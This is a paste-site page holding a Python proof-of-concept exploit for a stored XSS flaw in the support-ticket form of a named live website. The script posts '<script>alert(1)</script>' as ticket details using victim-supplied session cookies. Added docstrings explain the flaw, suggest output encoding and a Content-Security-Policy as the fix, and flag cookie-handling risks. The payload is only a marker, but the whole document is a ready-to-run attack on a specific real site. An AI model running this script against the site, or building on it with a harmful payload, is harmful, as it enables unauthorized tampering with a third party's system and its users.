FlyFar

An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com

Jan 15th, 2024
Python 1.21 KB | Cybersecurity | 0 0
  1. import sys
  2. import requests
  3.  
  4.  
  5. # https://anonstress.com Stored XSS Exploit
  6. # Date: 09/25/21
  7. # Author: 0x1CA3
  8.  
  9.  
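class Exploit:
    """Proof-of-concept submitter for the stored XSS in the support-ticket form.

    One ticket is posted whose ``details`` field contains script markup.
    The markup is only a problem if the application later renders stored
    ticket text without HTML-encoding it; that server-side behaviour is the
    defect being demonstrated, and it is not visible from this script.
    The fix belongs on the rendering side: context-aware output encoding of
    every ticket field, with a Content-Security-Policy as defence in depth.

    Args:
        sesion_cookie: Value sent as the ``fc_session`` cookie.
        other_cookie: Value sent both as the ``31k001c`` cookie and as the
            ``n3k0t`` form field.
    """

    # Upper bound, in seconds, on how long the single POST may block.
    REQUEST_TIMEOUT = 10

    def __init__(self, sesion_cookie, other_cookie):
        self.sesion_cookie = sesion_cookie
        self.other_cookie = other_cookie
        # Title of the ticket that gets created.
        self.title_name = "testone"
        # Benign marker: an alert box is enough to show that stored markup
        # is executed when the ticket is viewed.
        self.xss_payload = "<script>alert(1)</script>"

    def run(self):
        """Create one support ticket carrying the marker payload.

        The response is not inspected, so a rejected or failed submission is
        not reported. Returns ``None``.
        """
        site_cookies = {
            "31k001c": self.other_cookie,
            "fc_session": self.sesion_cookie,
        }
        # NOTE(review): the same value is sent as a cookie and as a form
        # field, which looks like a double-submit CSRF token -- confirm.
        payload = {
            "n3k0t": self.other_cookie,
            "title": self.title_name,
            "status": "1",
            "details": self.xss_payload,
        }
        # The context manager releases the connection pool, which the bare
        # Session() never did; the timeout keeps an unresponsive server from
        # blocking the call indefinitely.
        with requests.Session() as s:
            s.post(
                "https://anonstress.com/support/ticket/create",
                cookies=site_cookies,
                data=payload,
                timeout=self.REQUEST_TIMEOUT,
            )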
  30.  
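def main() -> None:
    """Read the two cookie values from the command line and submit the ticket.

    Exits with a non-zero status and a usage message on stderr when fewer
    than two arguments are given, so a calling shell or script can tell a
    usage error from a completed run.
    """
    if len(sys.argv) < 3:
        print(
            "Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>",
            file=sys.stderr,
        )
        sys.exit(1)
    # NOTE(review): session cookies passed as arguments end up in shell
    # history and are visible in the process list to other local users.
    sesion_cookie, other_cookie = sys.argv[1], sys.argv[2]
    Exploit(sesion_cookie, other_cookie).run()


if __name__ == "__main__":
    main()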